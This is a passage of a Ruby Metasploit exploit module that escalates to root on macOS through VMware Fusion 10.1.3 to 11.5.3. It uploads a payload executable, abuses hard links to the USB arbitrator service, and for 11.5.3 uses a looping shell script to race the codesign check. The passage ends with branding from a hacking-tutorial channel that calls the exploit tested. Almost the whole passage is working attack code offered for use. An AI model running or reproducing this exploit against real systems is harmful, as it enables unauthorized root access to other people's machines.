      fail_with Failure::BadConfig, 'Unable to determine VMware Fusion version. Set ForceExploit to override.'
    end
    Gem::Version.new(version)
  end

  def pre_11_5_3
    # Upload payload executable & chmod
    payload_filename = "#{base_dir}#{usb_service}"
    print_status "Uploading Payload: #{payload_filename}"
    write_file payload_filename, generate_payload_exe
    chmod payload_filename, 0o755
    register_file_for_cleanup payload_filename

    # create folder structure and hard link to the original binary
    root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
    link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
    cmd_exec "mkdir -p #{link_folder}"
    cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
    print_status "Created folder (#{link_folder}) and link"

    print_status 'Starting USB Service (5 sec pause)'
    # XXX: The ; used by cmd_exec will interfere with &, so pad it with :
    cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' & :"
    Rex.sleep 5 # give time for the service to execute our payload
    print_status 'Killing service'
    cmd_exec "pkill '#{open_usb_service}'"
    print_status "Deleting #{root_link_folder}"
    rm_rf root_link_folder
  end

  def exactly_11_5_3
    # Upload payload executable & chmod
    payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
    print_status "Uploading Payload to #{payload_name}"
    write_file payload_name, generate_payload_exe
    chmod payload_name, 0o755
    # create race with codesign check
    root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
    link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
    print_status 'Uploading race condition executable.'
    race = <<~EOF
      #!/bin/sh
      while [ "1" = "1" ]; do
        ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{base_dir}#{usb_service}'
        ln -f '#{payload_name}' '#{base_dir}#{usb_service}'
      done
    EOF
    racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
    upload_and_chmodx racer_name, race
    register_file_for_cleanup racer_name
    register_dirs_for_cleanup root_link_folder
    # create the hard link
    print_status "Creating folder (#{link_folder}) and link"
    cmd_exec "mkdir -p #{link_folder}"
    cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"

    # create the launcher to start the racer and keep launching our service to attempt to win
    launcher = <<~EOF
      #!/bin/sh
      #{racer_name} &
      for i in {1..#{datastore['MAXATTEMPTS']}}
      do
        echo "attempt $i";
        '#{link_folder}#{open_usb_service}'
      done
    EOF
    runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
    upload_and_chmodx runner_name, launcher
    register_file_for_cleanup runner_name

    print_status "Launching Exploit #{runner_name} (sleeping 15sec)"
    # XXX: The ; used by cmd_exec will interfere with &, so pad it with :
    results = cmd_exec "#{runner_name} & :"
    Rex.sleep 15 # give time for the service to execute our payload
    vprint_status results

    print_status 'Exploit Finished, killing scripts.'
    kill_process racer_name
    kill_process runner_name # in theory should be killed already but just in case
    kill_process "'#{link_folder}#{open_usb_service}'"
    # kill_process 'ln' a rogue ln -f may mess us up, but killing them seemed to be unreliable and mark the exploit as failed.
    # above caused: [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Unknown error
    # rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can't delete the folder
  end

  def check
    unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}"
      print_bad "'#{open_usb_service}' binary missing"
      return CheckCode::Safe
    end
    version = get_version
    if version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.3'))
      vprint_good "Vmware Fusion #{version} is exploitable"
    else
      print_bad "VMware Fusion #{version} is NOT exploitable"
      return CheckCode::Safe
    end
    CheckCode::Appears
  end

  def exploit
    # First check the system is vulnerable, or the user wants to run regardless
    unless check == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    # Check if we're already root
    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
      end
    end

    # Make sure we can write our payload to the remote system
    rm_rf content_dir # live dangerously.
    if directory? content_dir
      fail_with Failure::BadConfig, "#{content_dir} exists. Unable to delete automatically. Please delete or exploit will fail."
    end
    cmd_exec "mkdir -p #{base_dir}"
    register_dirs_for_cleanup content_dir
    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable."
    end

    version = get_version
    if version == Gem::Version.new('11.5.3')
      vprint_status 'Using 11.5.3 exploit'
      exactly_11_5_3
    elsif version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.2'))
      vprint_status 'Using pre-11.5.3 exploit'
      pre_11_5_3
    end
    rm_rf content_dir # live dangerously.
  end
end

🦑 TESTED BY UNDERCODE
🦑 2020 VMWARE EXPLOIT TESTED BY UNDERCODE
Undercode is ready to start training in leb after the corona situation :)
🦑 ANDROID HACKING & SECURITY TUTORIALS BY UNDERCODE